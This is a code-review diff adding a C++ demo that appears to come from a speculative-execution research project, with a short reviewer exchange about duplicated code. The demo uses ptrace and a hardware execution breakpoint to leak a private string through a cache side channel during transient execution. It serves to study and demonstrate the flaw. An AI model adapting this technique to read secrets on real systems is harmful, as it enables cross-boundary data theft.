demos/speculation_over_exec_hw_breakpoint.cc

```diff
@@ -0,0 +1,221 @@
+
+  for (int run = 0;; ++run) {
+    size_t safe_offset = run % strlen(public_data);
+    sidechannel.FlushOracle();
+
+    // We have to precompute the addresses in the oracle, because here the
+    // speculation window on Intel (not on AMD) is too small to allow
+    // computation of the unsafe address in the oracle speculatively.
+    const void *safe_address =
+        oracle.data() + static_cast<size_t>(data[safe_offset]);
+
+    // Architecturally dead variable - never read again. It is also the only
+    // fetch of the "data[offset]". Therefore its value is architecturally
+    // isolated from the rest of the program.
+    const void *unsafe_address =
+        oracle.data() + static_cast<size_t>(data[offset]);
+
+    // Successful access of the safe address in the Oracle.
+    ForceRead(safe_address);
+
+    // NOP instruction after the breakpoint label. That one is guarded by the
+    // execution breakpoint. Contrary to the read/write hardware watcher, this
+    // is a fault (not a trap) and the tracer moves the instruction pointer to
+    // afterspeculation instead.
+    asm volatile(
+        "breakpoint:\n"
+        "nop\n");
+
+    // Dead code. Executed only speculatively.
+    ForceRead(unsafe_address);
+
+    std::cout << "Dead code. Must not be printed." << std::endl;
+
+    // The exit call must not be unconditional, otherwise clang would optimize
+    // out everything that follows it and the linking would fail.
+    if (strlen(public_data) != 0) {
+      exit(EXIT_FAILURE);
+    }
+
+    // Tracer moves the instruction pointer to this label.
+    asm volatile("afterspeculation:");
+
+    std::pair<bool, char> result =
+        sidechannel.RecomputeScores(public_data[safe_offset]);
+
+    if (result.first) {
+      return result.second;
+    }
+
+    if (run > 100000) {
+      std::cerr << "Does not converge " << result.second << std::endl;
+      exit(EXIT_FAILURE);
+    }
+  }
+}
+
+void ChildProcess() {
+  // Allow the parent to trace child's execution.
+  int res = ptrace(PTRACE_TRACEME, 0, nullptr, nullptr);
+  if (res == -1) {
+    std::cerr << "PTRACE_TRACEME failed." << std::endl;
+    exit(EXIT_FAILURE);
+  }
+
+  // Synchronize with the parent. Let it setup the hardware breakpoint on the
+  // critical nop instruction.
+  raise(SIGSTOP);
+  MemoryAndSpeculationBarrier();
+
+  std::cout << "Leaking the string: ";
+  std::cout.flush();
+  const size_t private_offset = private_data - public_data;
+  for (size_t i = 0; i < strlen(private_data); ++i) {
+    std::cout << LeakByte(public_data, private_offset + i);
+    std::cout.flush();
+  }
+  std::cout << "\nDone!\n";
+}
+
+void ParentProcess(pid_t child) {
+  // Index of the breakpoint in the private data.
+  size_t index = 0;
+  while (true) {
+    int wstatus, res;
+    wait(&wstatus);
+    if (!WIFSTOPPED(wstatus)) {
+      break;  // Unexpected wait event.
+    }
+
+    if (WSTOPSIG(wstatus) == SIGSTOP) {
```

Comment:
This duplication with the data breakpoint code is okay for now as long as you have a task on your radar to clean it up.

Reply:
OK.